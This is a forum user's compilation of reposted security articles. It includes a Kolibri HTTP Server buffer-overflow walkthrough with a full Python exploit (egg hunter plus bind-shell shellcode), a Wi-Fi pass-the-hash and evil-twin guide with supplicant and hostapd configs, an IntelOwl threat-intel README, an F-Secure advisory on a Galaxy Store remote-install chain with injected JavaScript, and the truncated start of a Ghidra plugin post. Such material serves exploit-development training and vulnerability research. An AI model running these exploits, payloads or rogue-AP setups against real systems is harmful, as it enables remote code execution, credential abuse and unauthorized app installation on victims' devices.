
Everything posted by Nytro

-

Exploit Development: Kolibri v2.0 HTTP Server with EggHunter
Chenny Ren

I decided to write and publish a series of exercise walkthroughs while preparing for the OSCE exam. These exercises focus heavily on exploit development.

Exercise reference: fuzzysecurity, http://fuzzysecurity.com/tutorials/expDev/4.html
Kali Linux: 10.0.2.15
Windows XP Pro SP3 running Kolibri v2.0 HTTP Server: 10.0.2.7
Bad characters: "\x00\x0d\x0a\x3d\x20\x3f"

Run the Kolibri v2.0 HTTP Server on Windows XP (the debugging machine). The HTTP server listens on port 8080. Attach Immunity Debugger to the running Kolibri process.

Let's create our initial Python script on the Kali machine to replicate the crash. It sends 600 "A"s to the victim machine using the HTTP HEAD method. EIP is overwritten with "\x41", the letter A in hexadecimal. Following ESP in the dump, we can see the rest of the buffer.

Use pattern_create.rb and pattern_offset.rb to find out how many "A"s we need to reach EIP. Replace the "A"s in the script with the generated pattern and run it again. EIP is now overwritten by 32724131, which means we need 515 "A"s to reach EIP. We modify the script to verify this, and EIP is clearly overwritten by exactly four "B"s.

Next, let's find an address that can redirect the execution flow to ESP:

!mona jmp -r esp

"JMP ESP" is found at 0x71A91C8B in wshtcpip.dll. Update the address in the script, written in reverse (little-endian) byte order.

After redirecting the flow with "JMP ESP", we have very little space to work with: only 2 bytes (the "C"s, \x43). However, there is plenty of space above us, where our initial "A"s are. So we jump back a few bytes to get more room. A simple instruction for this is "\xEB\x??". Here "\xEB" is the short jump opcode and "\x??" is the number of bytes to jump back.
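Both numbers used in this walkthrough can be cross-checked in Python instead of with pattern_offset.rb and calc.exe. The sketch below is a minimal re-implementation that assumes Metasploit's default pattern alphabet (uppercase, lowercase, digits, giving Aa0Aa1...). The names `pattern_create`, `pattern_offset` and `short_jmp` are hypothetical helpers, not Metasploit's scripts.

```python
import itertools
import string
import struct


def pattern_create(length: int) -> bytes:
    """Cyclic pattern in the Metasploit style: Aa0Aa1...Az9Ba0... (assumed alphabet)."""
    out = bytearray()
    for upper, lower, digit in itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    ):
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(eip_value: int, length: int = 20280) -> int:
    """Offset of a 32-bit register value, stored little-endian in memory, within the pattern."""
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


def short_jmp(displacement: int) -> bytes:
    """Encode JMP SHORT (opcode 0xEB) with a signed 8-bit displacement.

    The displacement is relative to the end of the 2-byte instruction,
    so a backward jump is a negative number stored in two's complement.
    """
    if not -128 <= displacement <= 127:
        raise ValueError("a short jump only reaches -128..127 bytes")
    return b"\xeb" + struct.pack("b", displacement)


print(pattern_offset(0x32724131))  # 515
print(short_jmp(-50).hex())        # ebce
```

With this alphabet, the EIP value 0x32724131 appears in memory as the bytes "1Ar2". That sequence starts at offset 515, which matches the walkthrough, and -50 encoded as a signed byte is 0xCE.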
If we choose to go back 50 bytes, calc.exe can help us with the math: -50 as a signed byte is 0xCE, so the jump is \xEB\xCE.

Now we have 50 bytes to use. We generate a 32-byte egg hunter using the mona script, with the egg value "b33f".

Next, add our shellcode as stage 2, generated with msfvenom:

msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed

Final step: getting a shell. Execute the Python script. The bind shell payload then listens on port 4444 on the victim. Connect to it from the Kali machine with netcat (nc 10.0.2.7 4444), and we get a shell on the victim machine. Done!

Exploit script:

```python
#!/usr/bin/env python3
#
# Author : Chenny Ren
# Exploiting Kolibri HTTP Server (EggHunter)
# Ported to Python 3: every payload piece is a bytes literal.
#
import socket

# jmp esp found at 0x71a91c8b wshtcpip.dll
# Short jmp 50 bytes back opcode: \xEB\xCE
# 32 bytes Egghunter b33f
egghunter = (
    b"\x66\x81\xca\xff"
    b"\x0f\x42\x52\x6a"
    b"\x02\x58\xcd\x2e"
    b"\x3c\x05\x5a\x74"
    b"\xef\xb8\x62\x33"  # b3
    b"\x33\x66\x8b\xfa"  # 3f
    b"\xaf\x75\xea\xaf"
    b"\x75\xe7\xff\xe7"
)

# msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed
shellcode = b""
shellcode += b"\xd9\xcd\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37"
shellcode += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
shellcode += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
shellcode += b"\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x38\x68\x6b\x32"
shellcode += b"\x73\x30\x37\x70\x65\x50\x51\x70\x6e\x69\x6a\x45\x70"
shellcode += b"\x31\x4b\x70\x75\x34\x4e\x6b\x62\x70\x50\x30\x6c\x4b"
shellcode += b"\x36\x32\x34\x4c\x4e\x6b\x31\x42\x35\x44\x4c\x4b\x52"
shellcode += b"\x52\x65\x78\x46\x6f\x6d\x67\x31\x5a\x35\x76\x66\x51"
shellcode += b"\x39\x6f\x6c\x6c\x67\x4c\x45\x31\x73\x4c\x44\x42\x66"
shellcode += b"\x4c\x47\x50\x79\x51\x5a\x6f\x34\x4d\x33\x31\x58\x47"
shellcode += b"\x68\x62\x38\x72\x70\x52\x52\x77\x4c\x4b\x53\x62\x36"
shellcode += b"\x70\x6c\x4b\x53\x7a\x45\x6c\x6e\x6b\x62\x6c\x66\x71"
shellcode += b"\x50\x78\x68\x63\x43\x78\x46\x61\x6e\x31\x52\x71\x4e"
shellcode += b"\x6b\x56\x39\x65\x70\x45\x51\x59\x43\x6e\x6b\x43\x79"
shellcode += b"\x75\x48\x7a\x43\x67\x4a\x51\x59\x4e\x6b\x37\x44\x6e"
shellcode += b"\x6b\x76\x61\x49\x46\x66\x51\x39\x6f\x6e\x4c\x6f\x31"
shellcode += b"\x5a\x6f\x36\x6d\x73\x31\x6a\x67\x67\x48\x79\x70\x51"
shellcode += b"\x65\x59\x66\x36\x63\x63\x4d\x6a\x58\x47\x4b\x71\x6d"
shellcode += b"\x34\x64\x51\x65\x59\x74\x76\x38\x4e\x6b\x42\x78\x31"
shellcode += b"\x34\x35\x51\x49\x43\x51\x76\x6e\x6b\x34\x4c\x70\x4b"
shellcode += b"\x6e\x6b\x43\x68\x55\x4c\x76\x61\x79\x43\x4e\x6b\x35"
shellcode += b"\x54\x4c\x4b\x35\x51\x4a\x70\x6c\x49\x43\x74\x56\x44"
shellcode += b"\x46\x44\x33\x6b\x63\x6b\x73\x51\x51\x49\x63\x6a\x42"
shellcode += b"\x71\x79\x6f\x79\x70\x53\x6f\x43\x6f\x43\x6a\x4c\x4b"
shellcode += b"\x32\x32\x4a\x4b\x4e\x6d\x71\x4d\x61\x78\x57\x43\x77"
shellcode += b"\x42\x47\x70\x47\x70\x63\x58\x31\x67\x50\x73\x76\x52"
shellcode += b"\x73\x6f\x31\x44\x42\x48\x70\x4c\x53\x47\x67\x56\x36"
shellcode += b"\x67\x79\x6f\x6b\x65\x6c\x78\x4c\x50\x65\x51\x73\x30"
shellcode += b"\x55\x50\x75\x79\x79\x54\x30\x54\x46\x30\x61\x78\x45"
shellcode += b"\x79\x4d\x50\x42\x4b\x45\x50\x4b\x4f\x69\x45\x73\x5a"
shellcode += b"\x64\x48\x73\x69\x32\x70\x38\x62\x39\x6d\x73\x70\x76"
shellcode += b"\x30\x37\x30\x76\x30\x70\x68\x38\x6a\x64\x4f\x79\x4f"
shellcode += b"\x79\x70\x79\x6f\x68\x55\x5a\x37\x45\x38\x63\x32\x47"
shellcode += b"\x70\x74\x51\x43\x6c\x4f\x79\x79\x76\x53\x5a\x62\x30"
shellcode += b"\x36\x36\x43\x67\x53\x58\x68\x42\x49\x4b\x77\x47\x43"
shellcode += b"\x57\x4b\x4f\x39\x45\x71\x47\x30\x68\x48\x37\x4b\x59"
shellcode += b"\x50\x38\x79\x6f\x4b\x4f\x59\x45\x53\x67\x52\x48\x31"
shellcode += b"\x64\x38\x6c\x67\x4b\x38\x61\x4b\x4f\x4b\x65\x43\x67"
shellcode += b"\x6f\x67\x71\x78\x63\x45\x32\x4e\x32\x6d\x63\x51\x79"
shellcode += b"\x6f\x5a\x75\x55\x38\x32\x43\x42\x4d\x43\x54\x75\x50"
shellcode += b"\x6b\x39\x69\x73\x73\x67\x56\x37\x46\x37\x66\x51\x58"
shellcode += b"\x76\x63\x5a\x46\x72\x76\x39\x33\x66\x39\x72\x4b\x4d"
shellcode += b"\x30\x66\x78\x47\x50\x44\x56\x44\x75\x6c\x65\x51\x36"
shellcode += b"\x61\x4e\x6d\x62\x64\x61\x34\x74\x50\x39\x56\x65\x50"
shellcode += b"\x31\x54\x73\x64\x66\x30\x52\x76\x62\x76\x30\x56\x51"
shellcode += b"\x56\x76\x36\x52\x6e\x32\x76\x66\x36\x31\x43\x63\x66"
shellcode += b"\x42\x48\x32\x59\x48\x4c\x35\x6f\x6e\x66\x79\x6f\x58"
shellcode += b"\x55\x6c\x49\x69\x70\x30\x4e\x56\x36\x61\x56\x4b\x4f"
shellcode += b"\x36\x50\x62\x48\x54\x48\x4f\x77\x45\x4d\x35\x30\x79"
shellcode += b"\x6f\x78\x55\x6f\x4b\x6c\x30\x6d\x65\x4c\x62\x71\x46"
shellcode += b"\x61\x78\x4f\x56\x4e\x75\x4d\x6d\x6f\x6d\x79\x6f\x6b"
shellcode += b"\x65\x67\x4c\x47\x76\x73\x4c\x54\x4a\x4d\x50\x4b\x4b"
shellcode += b"\x4b\x50\x53\x45\x64\x45\x6d\x6b\x32\x67\x56\x73\x42"
shellcode += b"\x52\x72\x4f\x72\x4a\x55\x50\x46\x33\x59\x6f\x79\x45"
shellcode += b"\x41\x41"

# Stage 1 (in the URI): 478 + 32 (egg hunter) + 5 = 515 bytes to reach EIP,
# then JMP ESP (0x71A91C8B, little-endian) and the 50-byte short jump back.
Stage1 = b"A" * 478 + egghunter + b"A" * 5 + b"\x8B\x1C\xA9\x71" + b"\xEB\xCE"
# Stage 2 (in the User-Agent header): the egg twice, then the shellcode.
Stage2 = b"b33fb33f" + shellcode

buffer = (
    b"HEAD /" + Stage1 + b" HTTP/1.1\r\n"
    b"Host: 10.0.2.7:8080\r\n"
    b"User-Agent: " + Stage2 + b"\r\n"
    b"Keep-Alive: 115\r\n"
    b"Connection: keep-alive\r\n\r\n"
)

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("10.0.2.7", 8080))
expl.sendall(buffer)
expl.close()
```

Source: https://chennyren.medium.com/exploit-development-kolibri-v2-0-http-server-with-egghunter-c6314708aabf

-

Pass-the-hash WiFi
Posted by Michael Kruger on 02 October 2020. Categories: Wifi

Thanks to a tweet Dominic responded to, I saw someone mention passing-the-hash when I think they actually meant relaying. The terminology can certainly be confusing. However, it made me realise that I had never passed-the-hash with a Wi-Fi network. So, having learnt my lesson from previous projects, I first made sure this was possible for NT -> MSCHAP by looking at the RFC:

```
8.1.  GenerateNTResponse()

   GenerateNTResponse(
   IN  16-octet              AuthenticatorChallenge,
   IN  16-octet              PeerChallenge,
   IN  0-to-256-char         UserName,
   IN  0-to-256-unicode-char Password,
   OUT 24-octet              Response )
   {
      8-octet  Challenge
      16-octet PasswordHash

      ChallengeHash( PeerChallenge, AuthenticatorChallenge, UserName,
                     giving Challenge)

      NtPasswordHash( Password, giving PasswordHash )
      ChallengeResponse( Challenge, PasswordHash, giving Response )
   }
```

Looks like you can! As the pseudo code above shows, the ChallengeResponse is created from the NT hash (PasswordHash), not from the password itself. I then checked whether wpa_supplicant already supported this, and it turns out it does! The wpa_supplicant configuration file says:

password: Password string for EAP. This field can include either the plaintext password (using ASCII or hex string) or a NtPasswordHash (16-byte MD4 hash of password) in hash:<32 hex digits> format. NtPasswordHash can only be used when the password is for MSCHAPv2 or MSCHAP (EAP-MSCHAPv2, EAP-TTLS/MSCHAPv2, EAP-TTLS/MSCHAP, LEAP). EAP-PSK (128-bit PSK), EAP-PAX (128-bit PSK), and EAP-SAKE (256-bit PSK) is also configured using this field. For EAP-GPSK, this is a variable length PSK. ext: format can be used to indicate that the password is stored in external storage.

So, to pass-the-hash as a client, prefix the NT hash with hash: in the password field of your wpa_supplicant.conf and use that to authenticate.
```
network={
    ssid="example"
    scan_ssid=1
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="harold"
    password="hash:e19ccf75ee54e06b06a5907af13cef42"
    ca_cert="/etc/cert/ca.pem"
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}
```

This becomes useful when the machine account, rather than the user, authenticates to the Wi-Fi. You can then use the machine account's hash, which would typically not be crackable. Now, if you have compromised some hashes and the target uses PEAP for its Wi-Fi, you can connect easy peasy.

I am Corporate HotSpot

I also wondered if we could do the reverse. Let's say we have dumped the domain's password hashes and would like to trick people into connecting to our Wi-Fi so that we can provide them with free internet.

[Figure: Spock's Evil Twin Passing-the-hash]

As a quick reminder, this vector is interesting because of the mutual authentication requirement in MSCHAP. While your device authenticates against an AP, it also checks the AP's response to ensure that the AP knows the password as well. So if you are unable to prove you know the password, users will not connect unless their device specifically ignores the verification (as was the case for CVE-2019-6203). Anyway, it turns out you can do it from the other side as well. The AP only needs the NT hash, as the following pseudo code from the RFC shows:

```
8.7.  GenerateAuthenticatorResponse()

   GenerateAuthenticatorResponse(
   IN  0-to-256-unicode-char Password,
   IN  24-octet              NT-Response,
   IN  16-octet              PeerChallenge,
   IN  16-octet              AuthenticatorChallenge,
   IN  0-to-256-char         UserName,
   OUT 42-octet              AuthenticatorResponse )
   {
      16-octet              PasswordHash
      16-octet              PasswordHashHash
      8-octet               Challenge

      /*
       * "Magic" constants used in response generation
       */

      Magic1[39] =
         {0x4D, 0x61, 0x67, 0x69, 0x63, 0x20, 0x73, 0x65, 0x72, 0x76,
          0x65, 0x72, 0x20, 0x74, 0x6F, 0x20, 0x63, 0x6C, 0x69, 0x65,
          0x6E, 0x74, 0x20, 0x73, 0x69, 0x67, 0x6E, 0x69, 0x6E, 0x67,
          0x20, 0x63, 0x6F, 0x6E, 0x73, 0x74, 0x61, 0x6E, 0x74};

      Magic2[41] =
         {0x50, 0x61, 0x64, 0x20, 0x74, 0x6F, 0x20, 0x6D, 0x61, 0x6B,
          0x65, 0x20, 0x69, 0x74, 0x20, 0x64, 0x6F, 0x20, 0x6D, 0x6F,
          0x72, 0x65, 0x20, 0x74, 0x68, 0x61, 0x6E, 0x20, 0x6F, 0x6E,
          0x65, 0x20, 0x69, 0x74, 0x65, 0x72, 0x61, 0x74, 0x69, 0x6F,
          0x6E};

      /*
       * Hash the password with MD4
       */

      NtPasswordHash( Password, giving PasswordHash )

      /*
       * Now hash the hash
       */

      HashNtPasswordHash( PasswordHash, giving PasswordHashHash)

      SHAInit(Context)
      SHAUpdate(Context, PasswordHashHash, 16)
      SHAUpdate(Context, NTResponse, 24)
      SHAUpdate(Context, Magic1, 39)
      SHAFinal(Context, Digest)

      ChallengeHash( PeerChallenge, AuthenticatorChallenge, UserName,
                     giving Challenge)

      SHAInit(Context)
      SHAUpdate(Context, Digest, 20)
      SHAUpdate(Context, Challenge, 8)
      SHAUpdate(Context, Magic2, 41)
      SHAFinal(Context, Digest)

      /*
       * Encode the value of 'Digest' as "S=" followed by
       * 40 ASCII hexadecimal digits and return it in
       * AuthenticatorResponse.
       * For example,
       *   "S=0123456789ABCDEF0123456789ABCDEF01234567"
       */
   }
```

Once again, we just skip the step that converts the password to an NT hash and use the NT hash directly in the response generation.
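The RFC pseudo code translates almost line for line into Python. The sketch below computes the MSCHAPv2 authenticator response from an NT hash alone. `md4`, `challenge_hash` and `authenticator_response` are hypothetical helpers for illustration, not hostapd's code. The block carries its own pure-Python MD4 because hashlib's "md4" depends on OpenSSL's legacy provider and is often unavailable. The example inputs are the sample values published in RFC 2759.

```python
import hashlib
import struct

MASK = 0xFFFFFFFF
MAGIC1 = b"Magic server to client signing constant"    # 39 bytes, Magic1 above
MAGIC2 = b"Pad to make it do more than one iteration"  # 41 bytes, Magic2 above

# (message-word order, rotate amounts, additive constant) for MD4's three rounds
ROUNDS = (
    (tuple(range(16)), (3, 7, 11, 19), 0),
    ((0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
    ((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
)


def _rotl(x, n):
    x &= MASK
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", bytes(msg[off:off + 64]))
        a, b, c, d = state
        for rnd, (order, shifts, const) in enumerate(ROUNDS):
            for i in range(16):
                if rnd == 0:
                    f = (b & c) | (~b & d)
                elif rnd == 1:
                    f = (b & c) | (b & d) | (c & d)
                else:
                    f = b ^ c ^ d
                # Update the first register, then rotate roles (abcd -> dabc -> cdab -> bcda)
                a, b, c, d = d, _rotl(a + f + x[order[i]] + const, shifts[i % 4]), b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def challenge_hash(peer_challenge, authenticator_challenge, username):
    """RFC 2759 ChallengeHash: first 8 bytes of SHA1(peer || authenticator || user)."""
    return hashlib.sha1(peer_challenge + authenticator_challenge + username).digest()[:8]


def authenticator_response(nt_hash, nt_response, peer_challenge,
                           authenticator_challenge, username):
    """RFC 2759 GenerateAuthenticatorResponse, starting from the NT hash.

    The NtPasswordHash(Password) step is skipped: nt_hash is the 16-byte
    PasswordHash, so the plaintext password is never needed.
    """
    password_hash_hash = md4(nt_hash)  # HashNtPasswordHash
    digest = hashlib.sha1(password_hash_hash + nt_response + MAGIC1).digest()
    challenge = challenge_hash(peer_challenge, authenticator_challenge, username)
    digest = hashlib.sha1(digest + challenge + MAGIC2).digest()
    return "S=" + digest.hex().upper()


# Example inputs: the sample MS-CHAPv2 values from RFC 2759 (user "User").
nt_hash = bytes.fromhex("44EBBA8D5312B8D611474411F56989AE")
nt_response = bytes.fromhex("82309ECD8D708B5EA08FAA3981CD83544233114A3D85D6DF")
peer = bytes.fromhex("21402324255E262A28295F2B3A337C7E")
auth = bytes.fromhex("5B5D7C7D7B3F2F3E3C2C602132262628")
print(authenticator_response(nt_hash, nt_response, peer, auth, b"User"))
```

Only `nt_hash` enters the computation. An evil-twin AP holding a dumped NT hash can therefore produce a valid "S=" response, just as it could with the plaintext password.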
Hostapd supports this as well. The format in its EAP user file looks like this:

```
# Phase 2 (tunnelled within EAP-PEAP or EAP-TTLS) users
"test user"     MSCHAPV2        hash:000102030405060708090a0b0c0d0e0f   [2]
```

Now you have a hotspot that all domain users can connect to. You may also be able to trick user devices into fully connecting, so you can give them all the Internet.

Source: https://sensepost.com/blog/2020/pass-the-hash-wifi/

-

For urgent issues and priority support, visit https://xscode.com/intelowlproject/IntelOwl.

Intel Owl

Do you want to get threat intelligence data about a malware sample, an IP or a domain? Do you want to get this kind of data from multiple sources at the same time using a single API request? You are in the right place!

Intel Owl is an Open Source Intelligence (OSINT) solution to get threat intelligence data about a specific file, an IP or a domain from a single API at scale. It integrates a number of analyzers available online and is for everyone who needs a single point to query for info about a specific file or observable.

Features

- Provides enrichment of threat intel for malware as well as observables (IP, domain, URL and hash).
- This application is built to scale out and to speed up the retrieval of threat info.
- It can be easily integrated into your stack of security tools (pyintelowl) to automate common jobs that are usually performed manually, for instance by SOC analysts.
- Intel Owl is composed of analyzers that can be run to retrieve data from external sources (like VirusTotal or AbuseIPDB) or to generate intel from internal analyzers (like Yara or Oletools).
- API written in Django and Python 3.7.
- Inbuilt frontend client: IntelOwl-ng provides features such as a dashboard, visualizations of analysis data, easy-to-use forms for requesting new analyses, etc. (Live Demo)

Documentation

Documentation about IntelOwl installation, usage, configuration and contribution can be found at https://intelowl.readthedocs.io/.

Blog posts

To learn more about the project and its growth over time, you may be interested in reading the following:

- Intel Owl on Daily Swig
- Honeynet: v1.0.0 Announcement
- Certego Blog: First announcement

Available services or analyzers

You can see the full list of all available analyzers in the documentation or the live demo.
Inbuilt modules
- Static Document, RTF, PDF, PE, Generic File Analysis
- Strings analysis with ML
- PE Emulation with Speakeasy
- PE Signature verification
- PE Capabilities Extraction
- Emulated Javascript Analysis
- Android Malware Analysis
- SPF and DMARC Validator
- more...

External Services
- GreyNoise v2
- Intezer Scan
- VirusTotal v2+v3
- HybridAnalysis
- Censys.io
- Shodan
- AlienVault OTX
- Threatminer
- Abuse.ch
- many more...

Free modules that require additional configuration
- Cuckoo (requires at least one working Cuckoo instance)
- MISP (requires at least one working MISP instance)
- Yara (Community, Neo23x0, Intezer and McAfee rules are already available. You can also add your own rules)

Legal notice

You as a user of this project must review, accept and comply with the license terms of each downloaded/installed package listed below. By proceeding with the installation, you are accepting the license terms of each package, and acknowledging that your use of each package will be subject to its respective license terms.

osslsigncode, stringsifter, peepdf, pefile, oletools, XLMMacroDeobfuscator, MaxMind-DB-Reader-python, pysafebrowsing, PyMISP, OTX-Python-SDK, yara-python, GitPython, Yara community rules, Neo23x0 Yara sigs, Intezer Yara sigs, McAfee Yara sigs, Stratosphere Yara sigs, APKiD, Box-JS, Capa, Quark-Engine, IntelX, Speakeasy, Checkdmarc

Acknowledgments

This project was created and will be upgraded thanks to the following organizations:

Google Summer Of Code

The project was accepted to GSoC 2020 under the Honeynet Project!! A lot of new features were developed by Eshaan Bansal (Twitter). Stay tuned for the upcoming GSoC 2021! Join the Honeynet Slack chat for more info.

About the author and maintainers

Feel free to contact the main developers at any time:
- Matteo Lodi (Twitter): Author and creator
- Eshaan Bansal (Twitter): Principal maintainer

We also have a dedicated Twitter account for the project: @intel_owl.
Source: https://github.com/intelowlproject/IntelOwl

-

Samsung S20 - RCE via Samsung Galaxy Store App
Ken Gannon, 23 October 2020

Description

F-Secure looked into exploiting the Samsung S20 device for Tokyo Pwn2Own 2020. An exploit chain was found for version 4.5.19.13 of the Galaxy Store application. It could have allowed an attacker to install any application from the Galaxy Store without user consent.

Samsung patched this vulnerability at the end of September 2020, so it was no longer a viable entry for Pwn2Own. This blog post goes over the technical details of the vulnerability and how F-Secure intended to exploit it for Pwn2Own before it was patched.

Technical Details

Galaxy Store (com.sec.android.app.samsungapps) is Samsung's proprietary application store, pre-installed on Samsung devices. The application is built as a native Android application with a few WebView activities. Some of these WebView activities have JavaScript interfaces that provide additional functionality, such as installing and launching applications.

The WebView activity that F-Secure intended to use for Pwn2Own was "com.sec.android.app.samsungapps.slotpage.EditorialActivity". This activity could be launched in two ways:

- Browsable intent link:
  intent://apps.samsung.com/appquery/EditorialPage.as?url=http://img.samsungapps.com/yaypayloadyay.html#Intent;action=android.intent.action.VIEW;scheme=http;end
- NFC tag:
  Data MIME type: application/com.sec.android.app.samsungapps.detail
  Data URI: http://apps.samsung.com/appquery/EditorialPage.as?url=http://img.samsungapps.com/yaypayloadyay.html

At runtime, the "EditorialActivity" activity loaded a WebView and checked whether the user-supplied "url" parameter was valid.
The parameter was considered valid if it started with one of the following two values:

- http://img.samsungapps.com/
- https://img.samsungapps.com/

The method used to check the "url" parameter is below:

```java
public boolean isValidUrl(String str) {
    return str.startsWith("http://img.samsungapps.com/")
        || str.startsWith("https://img.samsungapps.com/");
}
```

If this method returned true, the WebView would load the user-supplied URL and add a JavaScript interface called "EditorialScriptInterface" to the WebView. This interface contained two methods of interest: "downloadApp" and "openApp".

The "downloadApp" method took a string value and passed it to another method, "e". That method executed the following actions:

- Checks whether the WebView is loaded into a valid URL, using the same "isValidUrl" method above
- Requests to download an app from the Galaxy Store with the same package name as the passed string value
- If the package is found, downloads and installs it

The following pseudo code demonstrates how this entire process worked:

```java
@JavascriptInterface
public void downloadApp(String str) {
    EditorialScriptInterface.this.e(str);
}

public void e(String str) {
    // Refuse to act unless the WebView's current URL passes isValidUrl()
    if (!EditorialActivity.isValidUrl(WebView.getUrl())) {
        Log.d("Editorial", "Url is not valid" + EditorialActivity.isValidUrl(WebView.getUrl()));
        return;
    }
    String GUID = str;            // package name supplied from JavaScript
    if (Store.search(GUID)) {
        Store.download(GUID);     // download and install the package
    }
}
```

The "openApp" method worked in a similar way. It passed a string value to the method "d", which executed the following actions:

- Checks whether the WebView is loaded into a valid URL, using the same "isValidUrl" method above
- Attempts to launch an installed app with the same package name as the supplied string value

The following pseudo code demonstrates how this entire process works:

```java
@JavascriptInterface
public void openApp(String str) {
    EditorialScriptInterface.this.d(str);
}

public void d(String str) {
    // Same URL gate as downloadApp()
    if (!EditorialActivity.isValidUrl(WebView.getUrl())) {
        Log.d("Editorial", "Url is not valid" + this.c.getUrl());
        return;
    }
    String GUID = str;            // package name supplied from JavaScript
    if (Device.isInstalled(GUID)) {
        Device.openApp(GUID);     // launch the installed package
    }
}
```

Attack Chain

A high-level overview of the chain that F-Secure intended to use for Pwn2Own was:

1. The phone is connected to an attacker-controlled WiFi network, or to a public WiFi network that the attacker is also on
2. The phone scans a prepared NFC tag, which launches the Galaxy Store application
3. The Galaxy Store application automatically launches the "EditorialActivity" activity, which also loads the JavaScript interface "EditorialScriptInterface"
4. The loaded WebView browses to the URL "http://img.samsungapps.com/yaypayloadyay.html"
5. The attacker intercepts the HTTP traffic and injects malicious JavaScript into the server's response
6. Force the phone to install a malicious application that the attacker has uploaded to the Galaxy Store
7. Force the phone to launch the newly installed malicious application

NFC NDEF

An NFC tag can contain a number of NDEF records for exchanging information with a phone that scans it. F-Secure intended to use an NFC tag with the following record:

Record 0: (Media) application/com.sec.android.app.samsungapps.detail
http://apps.samsung.com/appquery/EditorialPage.as?url=http://img.samsungapps.com/yaypayloadyay.html

Man in the Middle Attack

If a Samsung S20 device scanned the above NFC tag, the Galaxy Store application would open the "EditorialActivity" activity. That activity launches a WebView and loads the URL "http://img.samsungapps.com/yaypayloadyay.html". The WebView would also contain the JavaScript interface "EditorialScriptInterface".

Since the web page "http://img.samsungapps.com/yaypayloadyay.html" does not exist, the web server would respond with a "404 Not Found" HTTP error.
However, because the communication uses clear-text HTTP, a correctly positioned attacker could conduct a Man-in-the-Middle (MitM) attack and inject additional JavaScript into the server's HTTP response.

The following example JavaScript could be injected into the server's HTTP response. It automatically downloads and installs any application from the Galaxy Store and then opens that application:

```html
<script>
function openApp(){
    setTimeout(function(){
        GalaxyStore.openApp("<packageName>");
    }, 5000);
}
// download and install "<packageName>"
GalaxyStore.downloadApp("<packageName>");
// open "<packageName>" 5 seconds after this page has loaded
openApp();
</script>
```

Remediation and Mitigation

Samsung has released version 4.5.20.7 of the Galaxy Store application, which changed the "isValidUrl" method to the following:

```java
public boolean isValidUrl(String str) {
    return str.startsWith("https://img.samsungapps.com/");
}
```

As shown above, the "url" parameter must now start with "https://img.samsungapps.com/", which makes MitM attacks significantly more difficult. This change affects:

- whether the "EditorialActivity" WebView is able to load the user-provided URL
- whether the "downloadApp" JavaScript interface method is allowed to execute
- whether the "openApp" JavaScript interface method is allowed to execute

Note that this new version of the Galaxy Store may not come pre-installed with the October 2020 firmware for Samsung S20 devices. In that case, the user must manually open the Galaxy Store application, which will then prompt them to install a newer version.

F-Secure found that the attack remains exploitable against a specific user if that user is still running a vulnerable version of the Galaxy Store application and is never prompted to update it. This is because launching the "EditorialActivity" activity skips all the update checks that the Galaxy Store application would otherwise run when it starts up.
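The effect of the fix can be reproduced with a small Python mirror of both versions of `isValidUrl`. This is an illustrative sketch, not Samsung's code. The helper `is_valid_url` and the lookalike host `img.samsungapps.com.attacker.example` are hypothetical. The lookalike host shows why the trailing slash in the prefix matters.

```python
# Prefixes accepted by isValidUrl() before and after the fix (from the Java above).
OLD_PREFIXES = ("http://img.samsungapps.com/", "https://img.samsungapps.com/")
NEW_PREFIXES = ("https://img.samsungapps.com/",)


def is_valid_url(url: str, prefixes: tuple) -> bool:
    """Mirror of the Java String.startsWith() checks; str.startswith accepts a tuple."""
    return url.startswith(prefixes)


candidates = [
    "http://img.samsungapps.com/yaypayloadyay.html",        # clear text: open to MitM
    "https://img.samsungapps.com/yaypayloadyay.html",       # TLS-protected
    "https://img.samsungapps.com.attacker.example/x.html",  # hypothetical lookalike host
]
for url in candidates:
    print(is_valid_url(url, OLD_PREFIXES), is_valid_url(url, NEW_PREFIXES), url)
```

Only the first URL changes verdict between versions. The lookalike host is rejected by both, because the prefix ends in "/" right after the host name.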
It is recommended that all Samsung S20 users (and potentially all Samsung device users in general) open their Galaxy Store application at least once, so that they are prompted to update to the latest version.

Source: https://labs.f-secure.com/blog/samsung-s20-rce-via-samsung-galaxy-store-app/

-



















Automated Struct Identification with Ghidra
By Jeffball - November 04, 2020

At GRIMM, we do a lot of vulnerability and binary analysis research. As such, we often seek to automate some of the analysis steps and ease the burden on the individual researcher. One task that can be very mundane and time-consuming for certain types of programs (C++, firmware, etc.) is identifying structures' fields and applying the structure types to the corresponding functions within the decompiler. Thus, this summer we gave one of our interns, Alex Lin, the task of developing a Ghidra plugin to automatically identify a binary's structs and mark up the decompilation accordingly. Alex's writeup below describes the results of the project, GEARSHIFT. The plugin automates struct identification for function parameters by symbolically interpreting Ghidra's P-Code to determine how each parameter is accessed. The Ghidra plugin described in this blog can be found in our GEARSHIFT repository.

Background

